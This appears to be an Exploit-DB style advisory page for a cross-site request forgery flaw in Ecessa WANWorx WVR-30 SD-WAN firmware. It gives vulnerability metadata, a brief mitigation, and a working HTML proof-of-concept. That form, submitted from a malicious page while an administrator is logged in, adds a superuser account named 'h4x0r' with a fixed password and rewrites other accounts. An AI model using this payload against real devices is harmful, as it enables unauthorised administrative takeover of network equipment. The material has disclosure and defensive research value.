Ecessa WANWorx WVR-30 < 10.7.4 - Cross-Site Request Forgery (Add Superuser)

vendor:

WANWorx WVR-30

by:

LiquidWorm

7.5

CVSS

HIGH

Cross-Site Request Forgery

352

CWE

Product Name: WANWorx WVR-30

Affected Version From: 10.2.24

Affected Version To: 10.7.2004

Patch Exists: YES

Related CWE:

CPE: CPE-2.3:cpe:/a:ecessa_corporation:wvr-30_firmware:10.7.4

Metasploit:

Other Scripts:

Platforms Tested:

2018

Ecessa WANWorx WVR-30 < 10.7.4 - Cross-Site Request Forgery (Add Superuser)

The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site.

Mitigation:

Implement CSRF protection by including tokens in requests and validating them on the server side.

Source

Exploit-DB raw data:

# Exploit title: Ecessa WANWorx WVR-30 < 10.7.4 - Cross-Site Request Forgery (Add Superuser)
# Date: 2018-05-21
# Author: LiquidWorm
# Vendor: Ecessa Corporation
# Product web page: https://www.ecessa.com
# Affected version: 10.7.4, 10.6.9, 10.7.4, 10.6.5.2, 10.5.4, 10.2.24, 9.2.24

# Summary: Ecessa's WANworX SD-WAN solutions increase network performance and
# reliability by leveraging any connection. That can be premium priced MPLS,
# lower cost broadband, or cellular 4G or LTE. Many of today’s WAN deployments
# are based on older technology that was acceptable when businesses did not run
# at breakneck speed or when operations didn’t grind to a halt when connectivity
# was disrupted. In today’s cloud-based applications, datacenters and distributed
# networks, where so much is virtualized and delivered as–a-service, limited
# bandwidth and network outages don’t just slow productivity, they stop it.

# Desc: The application interface allows users to perform certain actions via
# HTTP requests without performing any validity checks to verify the requests.
# This can be exploited to perform certain actions with administrative privileges
# if a logged-in user visits a malicious web site.

<html>
  <body>
    <form action="https://127.0.0.1/cgi-bin/pl_web.cgi/util_configlogin_act" method="POST">
      <input type="hidden" name="savecrtcfg" value="checked" />
      <input type="hidden" name="user_username1" value="root" />
      <input type="hidden" name="user_enabled1" value="on" />
      <input type="hidden" name="user_passwd1" value="" />
      <input type="hidden" name="user_passwd_verify1" value="" />
      <input type="hidden" name="user_delete1" value="" />
      <input type="hidden" name="user_username2" value="admin" />
      <input type="hidden" name="user_passwd2" value="" />
      <input type="hidden" name="user_passwd_verify2" value="" />
      <input type="hidden" name="user_delete2" value="" />
      <input type="hidden" name="user_username3" value="user" />
      <input type="hidden" name="user_enabled3" value="on" />
      <input type="hidden" name="user_passwd3" value="" />
      <input type="hidden" name="user_passwd_verify3" value="" />
      <input type="hidden" name="user_delete3" value="" />
      <input type="hidden" name="user_username4" value="h4x0r" />
      <input type="hidden" name="user_enabled4" value="on" />
      <input type="hidden" name="user_superuser4" value="on" />
      <input type="hidden" name="user_passwd4" value="123123" />
      <input type="hidden" name="user_passwd_verify4" value="123123" />
      <input type="hidden" name="users_num" value="4" />
      <input type="hidden" name="page" value="util_configlogin" />
      <input type="hidden" name="val_requested_page" value="user_accounts" />
      <input type="hidden" name="savecrtcfg" value="checked" />
      <input type="hidden" name="page_uuid" value="73f90fa3-2e60-4fd7-a792-1ff6c7513d92" />
      <input type="hidden" name="form_has_changed" value="1" />
      <input type="submit" value="Supersize!" />
    </form>
  </body>
</html>